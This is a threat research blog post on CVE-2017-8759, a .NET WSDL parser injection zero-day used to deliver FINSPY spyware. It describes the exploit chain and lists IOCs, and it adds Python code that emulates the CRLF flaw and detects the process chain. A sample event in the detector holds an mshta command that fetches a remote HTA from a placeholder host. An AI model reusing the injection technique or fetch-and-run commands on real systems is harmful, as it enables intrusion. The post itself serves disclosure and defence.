Submitted URL: https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html
Effective URL: https://www.mandiant.com/resources/zero-day-used-to-distribute-finspy
Threat Research


FIREEYE UNCOVERS CVE-2017-8759: ZERO-DAY USED IN THE WILD TO DISTRIBUTE FINSPY

Genwei Jiang, Ben Read, James T. Bennett
Sep 12, 2017
4 mins read
Zero Day Threats

FireEye recently detected a malicious Microsoft Office RTF document that
leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This
vulnerability allows a malicious actor to inject arbitrary code during the
parsing of SOAP WSDL definition contents. Mandiant analyzed a Microsoft Word
document where attackers used the arbitrary code injection to download and
execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been
coordinating public disclosure timed with the release of a patch to address the
vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

VULNERABILITY USED TO TARGET RUSSIAN SPEAKERS

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c),
might have been used to target a Russian speaker. Upon successful exploitation
of CVE-2017-8759, the document downloads multiple components (details follow),
and eventually launches a FINSPY payload (MD5:
a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for
purchase as part of a “lawful intercept” capability. Based on this and previous
use of FINSPY, we assess with moderate confidence that this malicious document
was used by a nation-state to target a Russian-speaking entity for cyber
espionage purposes. Additional detections by FireEye’s Dynamic Threat
Intelligence system indicate that related activity, though potentially for a
different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL PARSER CODE INJECTION

A code injection vulnerability exists in the WSDL parser module within the
PrintClientProxy method (http://referencesource.microsoft.com/ -
System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl method does
not perform correct validation when the data it is given contains a CRLF
sequence. This allows an attacker to inject and execute arbitrary code. A
portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code
inserts the “//base.ConfigureProxy(this.GetType(),” string after the first
address, commenting out the remaining addresses. However, if a CRLF sequence is
present in one of the additional addresses, the code following the CRLF falls
outside the comment and is not commented out. Figure 2 shows that, due to the
lack of CRLF validation, a System.Diagnostics.Process.Start method call is
injected. The generated code is compiled by csc.exe of the .NET Framework and
loaded by the Office executable as a DLL.

Figure 2: SOAP definition VS Generated code
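The following is an added example, not code from the post or from the .NET source: a small Python emulation of the address-commenting step described above, with the flawed scheme-only URL check beside a hardened check that rejects CR/LF. The comment prefix follows the post's description; the sample addresses and the sentinel line are constructed.

```python
import re

# Constructed emulation of the address-commenting step the post describes.
# It is not the .NET System.Runtime.Remoting source (PrintClientProxy in
# wsdlparser.cs); only the shape of the inserted comment follows the post.
COMMENT_PREFIX = "//base.ConfigureProxy(this.GetType(),"


def lenient_is_valid_url(url):
    """Scheme-only check; embedded CR/LF pass through (the flawed behaviour)."""
    return url.startswith(("http://", "https://"))


def strict_is_valid_url(url):
    """Hardened check: scheme plus no CR, LF or other control characters."""
    if not url.startswith(("http://", "https://")):
        return False
    return re.search(r"[\x00-\x1f\x7f]", url) is None


def render_addresses(addresses, validator):
    """Emulate the generated C# fragment: the first address is used as-is,
    each further address is appended behind a line comment. Raises if the
    validator rejects any address, which is what the hardened path does."""
    for addr in addresses:
        if not validator(addr):
            raise ValueError("address rejected: %r" % addr)
    lines = ['base.ConfigureProxy(this.GetType(), "%s");' % addresses[0]]
    for extra in addresses[1:]:
        lines.append('%s "%s");' % (COMMENT_PREFIX, extra))
    return "\n".join(lines)


def uncommented_lines(source):
    """Generated lines that are not line comments, i.e. that would compile."""
    return [ln for ln in source.splitlines() if not ln.lstrip().startswith("//")]


# Constructed sample: the second address carries a CRLF and a harmless sentinel.
SAMPLE = [
    "http://example.invalid/soap",
    "http://example.invalid/soap\r\nSENTINEL_OUTSIDE_COMMENT();",
]


def demo():
    """Return (live generated lines under the flawed check, hardened verdict)."""
    leaked = uncommented_lines(render_addresses(SAMPLE, lenient_is_valid_url))
    try:
        render_addresses(SAMPLE, strict_is_valid_url)
        hardened_rejects = False
    except ValueError:
        hardened_rejects = True
    return len(leaked), hardened_rejects
```

With the flawed check the sentinel line lands outside the comment as a second live statement; with the hardened check the whole definition is refused before any source is generated.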

THE IN-THE-WILD ATTACKS

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF)
document, similar to the CVE-2017-0199 documents we previously reported on. The
malicious samples contained embedded SOAP monikers to facilitate exploitation
(Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an
attacker-controlled server. The WSDL parser, implemented in
System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content and
generates a .cs source file in the working directory. The csc.exe of the .NET
Framework then compiles the generated source code into a library, namely
http[url path].dll. Microsoft Office then loads the library, completing the
exploitation stage. Figure 4 shows an example library loaded as a result of
exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and
leverages mshta.exe to retrieve an HTA script named “word.db” from the same
server. The HTA script removes the source code, compiled DLL and PDB files
from disk and then downloads and executes the FINSPY malware named “left.jpg,”
which, in spite of the .jpg extension and “image/jpeg” content-type, is actually
an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware is placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[6 random
numbers].exe. Figure 6 shows the process creation chain under Process Monitor.

Figure 6: Process Created Chain
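As an added example (not part of the original post), the process chain described above, Office spawning csc.exe and mshta.exe and the dropped OfficeUpdte-KB######.exe, can be turned into detection logic over process-creation events. The event format, pids, paths and hostname below are constructed for illustration, not taken from the post's figures.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Drop location from the post: %appdata%\Microsoft\Windows\OfficeUpdte-KB[6 random numbers].exe
OFFICE_UPDTE_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\OfficeUpdte-KB\d{6}\.exe$", re.I)

# Constructed sample process-creation events: (pid, ppid, image, command line).
EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "WINWORD.EXE /n Проект.doc"),
    (300, 200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\http_example.cmdline"),
    (400, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/word.db"),
    (500, 400, r"C:\Users\u\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB123456.exe",
     "OfficeUpdte-KB123456.exe"),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def office_ancestor(pid, by_pid):
    """Walk the parent chain; return the first Office image found, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ppid, image, _ = by_pid[pid]
        if image_name(image) in OFFICE:
            return image_name(image)
        pid = ppid
    return None


def detect(events):
    """Return (pid, reason) for each event matching a stage of the chain."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    findings = []
    for pid, ppid, image, cmd in events:
        name = image_name(image)
        parent = office_ancestor(ppid, by_pid)
        if name == "csc.exe" and parent:
            findings.append((pid, "csc.exe compiling under %s (WSDL proxy generation)" % parent))
        elif name == "mshta.exe" and parent and re.search(r"https?://", cmd, re.I):
            findings.append((pid, "mshta.exe fetching a remote HTA under %s" % parent))
        elif OFFICE_UPDTE_RE.search(image):
            findings.append((pid, "OfficeUpdte-KB######.exe executed from the roaming profile"))
    return findings
```

The first two rules key on ancestry rather than the direct parent, so the mshta.exe stage still matches when an intermediate process sits between Office and the HTA host.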

THE MALWARE

The “left.jpg” (MD5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY.
It leverages heavily obfuscated code that employs a built-in virtual machine,
among other anti-analysis techniques, to make reversing more difficult. As
likely another anti-analysis technique, it parses its own full path and
searches for the string representation of its own MD5 hash, since many
resources, such as analysis tools and sandboxes, rename files and samples to
their MD5 hash in order to ensure unique filenames. This variant runs with a
mutex of "WininetStartupMutex0".

CONCLUSION

CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY
uncovered by FireEye in 2017. These exposures demonstrate the significant
resources available to “lawful intercept” companies and their customers.
Furthermore, FINSPY has been sold to multiple clients, suggesting the
vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we
have not found evidence of this, the zero-day used to distribute FINSPY in
April 2017, CVE-2017-0199, was simultaneously being used by a financially
motivated actor. If the actors behind FINSPY obtained this vulnerability from
the same source used previously, it is possible that source sold it to
additional actors.

ACKNOWLEDGEMENT

Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE
Team and FireEye iSIGHT Intelligence for their contributions to this blog. We
also thank everyone from the Microsoft Security Response Center (MSRC) who
worked with us on this issue.